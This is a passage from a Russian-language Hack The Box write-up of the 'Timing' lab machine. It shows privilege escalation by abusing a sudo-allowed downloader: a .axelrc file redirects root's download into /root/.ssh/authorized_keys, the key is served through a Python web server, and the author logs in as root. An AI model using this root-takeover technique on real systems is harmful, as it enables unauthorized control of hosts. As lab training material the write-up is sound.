  <p id="0150">В нас­трой­ках про­писан при­виле­гиро­ван­ный запуск <strong>/usr/bin/netutils</strong> без вво­да пароля (NOPASSWD). Прос­мотрим тип фай­ла.</p>
  <figure id="NXUM">
    <img src="https://img2.teletype.in/files/d5/85/d58512d9-b0a8-4728-927d-961ed4bdec7f.png" />
    <figcaption>Оп­ределе­ние типа фай­ла /usr/bin/netutils</figcaption>
  </figure>
  <p id="DqsS">Это обыч­ный скрипт. Давай гля­нем на его содер­жимое.</p>
  <figure id="jHSj">
    <img src="https://img2.teletype.in/files/1a/90/1a904ba6-5717-4959-8345-408856814ae6.png" />
    <figcaption>Со­дер­жимое фай­ла /usr/bin/netutils</figcaption>
  </figure>
  <p id="N5NV">Это поль­зователь­ское при­ложе­ние на Java. Но так как оно рас­положе­но в катало­ге рута, мы не можем получить дос­туп к самому фай­лу и деком­пилиро­вать его, что­бы изу­чить. Тог­да давай хотя бы запус­тим прог­рамму и пос­мотрим, как она работа­ет.</p>
  <figure id="Y5BA">
    <img src="https://img3.teletype.in/files/2a/c4/2ac4d240-b02a-465a-acf2-238a106b121f.png" />
    <figcaption>Ме­ню при­ложе­ния</figcaption>
  </figure>
  <p id="1H1z">Нам пред­лага­ют выб­рать одну из опций: FTP или HTTP. Пос­ле чего с ука­зан­ного ресур­са заг­ружа­ется файл.</p>
  <figure id="lWNJ">
    <img src="https://img4.teletype.in/files/7f/f3/7ff3673d-1002-4b48-9ad0-868f87f87dda.png" />
    <figcaption>Со­обще­ние о заг­рузке фай­ла</figcaption>
  </figure>
  <p id="fQHr">Пос­мотрим, что про­исхо­дит с про­цес­сами в сис­теме при выпол­нении это­го при­ложе­ния. Для отсле­жива­ния про­цес­сов будем исполь­зовать <a href="https://github.com/DominicBreuker/pspy" target="_blank">pspy64</a>. Заг­рузим его на хост:</p>
  <p id="Lik8">1scp ./pspy64 aaron@timing.htb:/tmp/</p>
  <p id="2iRZ">И выпол­ним. В выводе видим запуск скрип­та, но, что более инте­рес­но, пос­ле ука­зания адре­са для заг­рузки исполь­зует­ся прог­рамма axel в кон­тек­сте поль­зовате­ля с UID=0, а это поль­зователь root.</p>
  <figure id="gAIf">
    <img src="https://img1.teletype.in/files/43/89/438986e7-5350-4755-95e6-6b6266b01b91.png" />
    <figcaption>Ло­ги pspy</figcaption>
  </figure>
  <p id="OBlk">Я сра­зу поп­робовал выпол­нить инъ­екцию коман­ды ОС, но это ничего не дало.</p>
  <figure id="ZZlM">
    <img src="https://img4.teletype.in/files/7f/a8/7fa87ce7-d337-4fe0-b97c-7a429b52b745.png" />
    <figcaption>Тес­тирова­ние OS Command Injection</figcaption>
  </figure>
  <p id="iI3j">Од­нако мы можем кон­фигури­ровать axel и управлять некото­рыми его парамет­рами, к при­меру име­нем фай­ла и катало­гом для его сох­ранения. Недол­го раз­мышляя, про­буем сох­ранить файл как пуб­личный SSH-ключ поль­зовате­ля root. Для это­го в домаш­нем катало­ге текуще­го поль­зовате­ля сох­раним файл .axelrc со сле­дующим содер­жимым:</p>
  <p id="Co2r">1default_filename = /root/.ssh/authorized_keys</p>
  <figure id="yKwh">
    <img src="https://img1.teletype.in/files/01/df/01dfc76d-858a-41d9-b5b3-18e4ffb72e77.png" />
    <figcaption>Файл кон­фигура­ций axel</figcaption>
  </figure>
  <p id="SZza">На локаль­ном хос­те сге­нери­руем пару клю­чей (ssh-keygen) и пере­име­нуем пуб­личный, что­бы он называл­ся index.html. Запус­тим прос­той веб‑сер­вер на Python:</p>
  <p id="DdY8">1python3 -m http.server 80</p>
  <p id="2YQK">А затем обра­тим­ся к нему из тес­тиру­емо­го при­ложе­ния.</p>
  <figure id="80U0">
    <img src="https://img4.teletype.in/files/b9/96/b996fa28-b21a-403b-adaf-d89f4c644850.png" />
    <figcaption>За­пись SSH-клю­ча</figcaption>
  </figure>
  <p id="ACPm">Ви­дим сооб­щение с име­нем сох­ранен­ного фай­ла, про­буем под­клю­чить­ся с зак­рытым клю­чом и получа­ем кон­троль над хос­том.</p>
  <figure id="NZcE">
    <img src="https://img1.teletype.in/files/06/50/06507d0b-8a0c-404b-affd-72c403892f8e.png" />
    <figcaption>Взлом веб-сервера на PHP. Флаг рута</figcaption>
  </figure>
  <p id="nsrV">Ма­шина зах­вачена, и у нас есть флаг рута.</p>
  <p id="C87P"><strong>Заключение</strong></p>
  <p id="2uUe">Се­год­ня мы с вами прошли путь от обычного ска­ниро­вания сай­та до экс­плу­ата­ции уяз­вимос­ти типа LFI и заг­рузки шел­ла. Надеюсь вам понравился наше увлекательное приключение Timing с пло­щад­ки Hack The Box.</p>
  <p id="zxPn"><strong>Полезные ссылки:</strong></p>
  <ul id="DM3W">
    <li id="PA0F"><a href="https://spy-soft.net/django-website-hack/" target="_blank">Взлом сайта на Django</a></li>
    <li id="8fji"><a href="https://spy-soft.net/hack-nginx/" target="_blank">Взлом nginx с помощью уяз­вимости в скрип­те</a></li>
    <li id="J4uE"><a href="https://spy-soft.net/hacking-web-server-via-ssrf/" target="_blank">Взлом веб-сервера на Windows и Apache через SSRF</a></li>
  </ul>
  <p id="StjF"><a href="https://spy-soft.net/hacking-web-server-php/" target="_blank">Источник</a></p>
  <figure id="ueE9">
    <img src="https://img4.teletype.in/files/f3/21/f321894a-18ef-4f4c-8ec5-c93d98dc8d69.png" />
  </figure>
  <p id="uqsh"><strong>Наши проекты:</strong></p>
  <p id="UVdc">- Кибер новости: <a href="https://t.me/matrixleaks" target="_blank"><strong>the Matrix</strong></a><br />- Хакинг: <a href="https://t.me/+bby6PJAbqpNhOWZh" target="_blank"><strong>/me Hacker</strong></a><br />- Кодинг: <a href="https://t.me/+zBgEm0olmpxlMzA6" target="_blank"><strong>Minor Code</strong></a></p>

]]></content:encoded></item></channel></rss>